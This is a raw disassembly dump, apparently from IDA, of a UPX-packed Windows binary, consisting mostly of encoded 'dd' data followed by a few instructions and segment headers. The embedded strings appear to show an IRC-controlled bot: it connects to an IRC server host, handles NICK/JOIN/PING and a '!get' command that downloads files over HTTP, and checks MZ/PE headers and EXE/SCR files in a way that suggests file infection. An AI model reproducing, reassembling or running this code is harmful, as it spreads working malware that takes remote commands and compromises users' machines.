dd 59106AC0h, 5050ABF3h, 50505050h, 95FF5250h, 40242Fh
dd 208C481h, 74FF0000h, 95FF0824h, 4024D3h, 0D395FF53h
dd 5D004024h, 800004C2h, 1750A3Eh, 848D8B46h, 0E3004014h
dd 958D19h, 3004010h, 0D2FF56D1h, 880FC084h, 11Fh, 110840Fh
dd 3E800000h, 4610753Ah, 0F003E80h, 10184h, 203E8000h
dd 8146F175h, 4E49503Eh, 8B427547h, 146C6CFh, 51CE2B4Fh
dd 5651006Ah, 0CB95FF53h, 59004024h, 850FC13Bh, 0DFh, 1C32858Dh
dd 6A0040h, 0C68h, 0FF535000h, 4024CB95h, 0C3D00h, 850F0000h
dd 0BFh, 0B1E9h, 503E8100h, 0F564952h, 0A585h, 8C68300h
dd 0F0D3CACh, 9984h, 75203C00h, 3A3CACF3h, 8C850Fh, 0DAD0000h
dd 20202020h, 6567213Dh, 0AC7F7574h, 7C75203Ch, 20FF7E81h
dd 75747468h, 37E8171h, 2F2F3A70h, 47C66875h, 310F00FFh
dd 2710BAh, 52E2F700h, 248395FFh, 0C0330040h, 50505050h
dd 9E8h, 776F4400h, 616F6C6Eh, 95FF0064h, 4024DBh, 3674C085h
dd 8589C933h, 402505h, 2006851h, 51518000h, 95FF5056h
dd 4024DFh, 1992958Dh, 33500040h, 505154C9h, 0FF515152h
dd 40243795h, 24048700h, 240795FFh, 0C3F80040h, 14778D80h
dd 0F9010040h, 464F53C3h, 52415754h, 694D5C45h, 736F7263h
dd 5C74666Fh, 646E6957h, 5C73776Fh, 72727543h, 56746E65h
dd 69737265h, 455C6E6Fh, 6F6C7078h, 726572h, 71696E55h
dd 6F486575h, 2007473h, 0F0FF00h, 70000000h, 69786F72h
dd 692E616Dh, 61676372h, 7978616Ch, 6C702Eh, 4B43494Eh
dd 6D676D20h, 70646376h, 53550A6Eh, 74205245h, 35303230h
dd 2E203130h, 3A202E20h, 494F4A5Fh, 7626204Eh, 75747269h
dd 0E8550Ah, 5D000000h, 1C44ED81h, 85C60040h, 401477h
dd 5B95FF00h, 0C1004024h, 3C741FE8h, 0B58B1E6Ah, 40241Bh
dd 2E3CAC59h, 81662A75h, 751DFF3Eh, 0FBBD8D23h, 8B004024h
dd 0A5570276h, 858DA566h, 40234Fh, 2375858Fh, 89FA0040h
dd 4E8CFA46h, 1B1FBFEh, 43EBCFE2h, 149F858Dh, 6A500040h
dd 0FF066A00h, 40246B95h, 247C8300h, 2B750408h, 4E8h, 43465300h
dd 4F95FF00h, 0E8004024h, 0FFFFFC4Ch, 7E8h, 43465300h
dd 534F5Fh, 244F95FFh, 35E80040h, 0E8FFFFFCh, 0FFFFF449h
dd 12628DFFh, 0BE80040h, 55000000h, 33524553h, 4C442E32h
dd 95FF004Ch, 402463h, 0AE8h, 70737700h, 746E6972h, 50004166h
dd 241395FFh, 85890040h, 40241Fh, 8D8D310Fh, 401789h, 25018589h
dd 0FF510040h, 40246395h, 4689300h, 8D000000h, 401796B5h
dd 0BD8D5900h, 4024E7h, 0FFF746E8h, 85C766FFh, 401BF6h
dd 0A583F0FFh, 401BF8h, 0B6958D00h, 5000401Bh, 6A016A54h
dd 2685200h, 0FF800000h, 4024EB95h, 5AC08500h, 8D8D2275h
dd 401BE9h, 8D066A52h, 401BF6B5h, 50565400h, 0FF525150h
dd 4024EF95h, 95FF5800h, 4024E7h, 270885C6h, 0E8000040h
dd 0Ch, 434F5357h, 2E32334Bh, 4C4C44h, 246395FFh, 68930040h
dd 7, 16EDB58Dh, 8D590040h, 4024B7BDh, 0F6C1E800h, 0CE8FFFFh
dd 57000000h, 4E494E49h, 442E5445h, 0FF004C4Ch, 40246395h
dd 0FC08500h, 1E784h, 5689300h, 8D000000h, 40172BB5h, 0BD8D5900h
dd 4024D3h, 0FFF68AE8h, 0D7BD83FFh, 4024h, 1C2840Fh, 0EC810000h
dd 190h, 1016854h, 95FF0000h, 4024B7h, 190C481h, 8B500000h
dd 52006AD4h, 24D795FFh, 0C0850040h, 680D7559h, 1388h
dd 248395FFh, 0E2EB0040h, 1BF8BD83h, 75000040h, 0FC858D29h
dd 5000401Bh, 24C395FFh, 0C0850040h, 13B840Fh, 408B0000h
dd 0FF008B0Ch, 0F8858F30h, 0C600401Bh, 40270885h, 6A0100h
dd 26A016Ah, 24CF95FFh, 0F8830040h, 12840FFFh, 93000001h
dd 1BF4958Dh, 106A0040h, 95FF5352h, 4024BFh, 850FC085h
dd 0F2h, 1C16BD8Dh, 8B10040h, 0FFFAC0E8h, 9468FFh, 2B5E0000h
dd 243489E6h, 5F95FF54h, 8D004024h, 401C24BDh, 0E801B100h
dd 0FFFFFAA1h, 1024448Bh, 0B08E0C1h, 0C1042444h, 440B08E0h
dd 0E8500824h, 5, 78362E25h, 95FF5700h, 40241Fh, 0C60CC483h
dd 8D200647h, 401C1195h, 68006A00h, 21h, 95FF5352h, 4024CBh
dd 14247C8Dh, 2395FF57h, 0C6004024h, 400A3804h, 5750006Ah
dd 0CB95FF53h, 3004024h, 32BD8DE6h, 6A00401Ch, 0C6800h
dd 53570000h, 24CB95FFh, 0C3D0040h, 75000000h, 9B58D4Dh
dd 8D004025h, 4027088Dh, 6ACE2B00h, 53565100h, 24C795FFh
dd 0F8830040h, 912F7E00h, 0B58DFE8Bh, 402509h, 0AEF20DB0h
dd 0E8601075h, 0FFFFFAF7h, 0E3177261h, 1778D09h, 0CF8BEAEBh
dd 0BD8DCE2Bh, 402509h, 0F787A4F3h, 0FF53B9EBh, 4024BB95h
dd 77BD8000h, 1004014h, 30682A74h, 0FF000075h, 40248395h
dd 8BD8000h, 4027h, 85C71174h, 401BF8h, 0
dd 270885C6h, 0E9000040h, 0FFFFFE56h, 148085C7h, 40h, 0C25D8000h
dd 0B58D0004h, 402709h, 4395FF56h, 83004024h, 840FFFF8h
dd 0BBh, 280D8589h, 6A0040h, 7B95FF56h, 85004024h, 0A4840FC0h
dd 2B000000h, 6A5050C0h, 16A5003h, 68h, 95FF56C0h, 402427h
dd 0FFFF883h, 2E484h, 11858900h, 8D004028h, 4028158Dh
dd 1D958D00h, 51004028h, 50006A52h, 244B95FFh, 0F8830040h
dd 0B2840FFFh, 6A000002h, 11B5FF00h, 0FF004028h, 40244795h
dd 0FFF88300h, 29B840Fh, 85890000h, 402825h, 0C303C933h
dd 6A515051h, 0B5FF5104h, 402811h, 242B95FFh, 0C0850040h
dd 277840Fh, 0C9330000h, 28298589h, 51510040h, 1F6851h
dd 0FF50000Fh, 40246795h, 0FC08500h, 23084h, 2D858900h
dd 0C3004028h, 0B8384B8Bh, 5838h, 0C103D233h, 0E1F7F1F7h
dd 28358589h, 4B8B0040h, 1406B83Ch, 0D2330000h, 0F1F7C103h
dd 8589E1F7h, 402831h, 4BB70FC3h, 36E3F906h, 0F18538Dh
dd 31443B7h, 0C16B49D0h, 81D00328h, 69775F3Ah, 1E74F96Eh
dd 0C7A8349h, 8BDF7201h, 428B3C4Bh, 10420314h, 0FF48448Dh
dd 0C123D9F7h, 2825853Bh, 59C30040h, 0C24448Bh, 0B88889h
dd 0C0330000h, 0EBCF8BC3h, 9BD8D0Bh, 0FC004027h, 0C933DF8Bh
dd 72613CACh, 777A3C06h, 0AA202C02h, 0EC745C3Ch, 0DD742E3Ch
dd 0E875003Ch, 18BC8E3h, 4558453Dh, 3D0B7400h, 524353h
dd 0FF49850Fh, 38BFFFFh, 4E49573Dh, 3C840F43h, 3DFFFFFFh
dd 4E554357h, 0FF31840Fh, 573DFFFFh, 0F323343h, 0FFFF2684h
dd 53503DFFh, 840F4F54h, 0FFFFFF1Bh, 43E8DB33h, 0FFFFFFEh
dd 0FFFF0E84h, 0E8D233FFh, 16h, 0FFFF6EE8h, 0E8FFh, 815D0000h
dd 4021B3EDh, 0F9E900h, 0FF640000h, 2DB58B32h, 64004028h
dd 81662289h, 0F5A4D3Eh, 0E285h, 3C5E8B00h, 8166DE03h
dd 0F45503Bh, 0D285h, 1643F700h, 2000h, 0C5850Fh, 43F60000h
dd 840F025Ch, 0BBh, 20207E81h, 0F202020h, 0AE84h, 0FECFE800h
dd 820FFFFFh, 0A3h, 0FFFE97E8h, 0A2E8FFh, 9D8B0000h, 402831h
dd 0FFFDB5E8h, 88840FFFh, 8B000000h, 40282DB5h, 3C5E8B00h
dd 9EE8DE03h, 72FFFFFEh, 244A8176h, 0E0000060h, 356FE8Bh
dd 0B58D147Ah, 401000h, 0B9107A03h, 501h, 0B1A5F357h, 0F302E303h
dd 525E5FA4h, 8D92310Fh, 15587h, 0FF508800h, 0FFEECBE8h
dd 4A8B5AFFh, 104A030Ch, 2B05418Dh, 47892843h, 2046C712h
dd 20202020h, 8B284B89h, 858B104Ah, 402831h, 73084A39h
dd 84A8903h, 83104201h, 8B005863h, 40283585h, 8420100h
dd 33504301h, 228B64D2h, 58028F64h, 2811BD83h, 0F000040h
dd 0FFFDE284h, 2DB5FFFFh, 0FF004028h, 40248795h, 29B5FF00h
dd 0FF004028h, 40240795h, 158D8D00h, 8D004028h, 40281D95h
dd 6A525100h, 11B5FF00h, 0FF004028h, 40247F95h, 11B5FF00h
dd 0FF004028h, 40240795h, 9B58D00h, 0FF004027h, 40280DB5h
dd 95FF5600h, 40247Bh, 2811A583h, 0C3000040h, 0E8h, 16A5D00h
dd 232EED81h, 0F0580040h, 8085C10Fh, 85004014h, 0C883C3C0h
dd 0C10FF0FFh, 40148085h, 103DC300h, 75002A00h, 7C81661Ch
dd 716C0C24h, 0E8601375h, 0FFFFFFC4h, 0C2E80575h, 0E8FFFFFDh
dd 0FFFFFFD2h, 2DFF2E61h, 12345678h, 0FFAAE860h, 3975FFFFh
dd 3024448Bh, 2709B58Dh, 508B0040h, 3A816608h, 25730206h
dd 6856h, 0C48B00FFh, 5052006Ah, 24B395FFh, 0C4830040h
dd 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFD74E8h, 0FF84E8FFh
dd 0B861FFFFh, 25h, 2FB8C3h, 10E80000h, 0C2000000h, 30B80020h
dd 0E8000000h, 3, 8D0024C2h, 0CD0C2454h, 0F8832Eh, 0E860197Ch
dd 0
; ---------------------------------------------------------------------------
mov edx, [esp+30h]
pop ebp
mov ebx, [edx]
sub ebp, 4023F1h
call sub_30907A86
popa
retn 4
; ---------------------------------------------------------------------------
dw 7963h
dd 37DE77E7h, 157D77E7h, 0A5FD77F5h, 77E7h, 2 dup(0)
dd 46720000h, 0A83777E7h, 779777E7h, 1BB877E7h, 0AA8377E6h
dd 0AC3777E7h, 0B1E777E7h, 3C4977EBh, 4CAB77E7h, 93EF77E7h
dd 3CE277E7h, 9F9377E7h, 0AF8F77E7h, 0AD3477E6h, 0C48677E6h
dd 0C65777E7h, 5D877E7h, 4D7677E8h, 0C81577E7h, 6B777E7h
dd 0A59577E7h, 0A6E977EBh, 39677EBh, 11A77E7h, 1BE677E7h
dd 509077E6h, 980A77E7h, 9D8C77E7h, 0E46377E7h, 0E60377F7h
dd 0E6A377F7h, 0E6B377F7h, 0EA7377F7h, 0EB6377F7h, 0EC4377F7h
dd 0F50377F7h, 263377F7h, 77F5h, 1A32h dup(0)
UPX2 ends
; Section 4. (virtual address 0000F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000F000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3090F000h
align 2000h
_idata2 ends
end start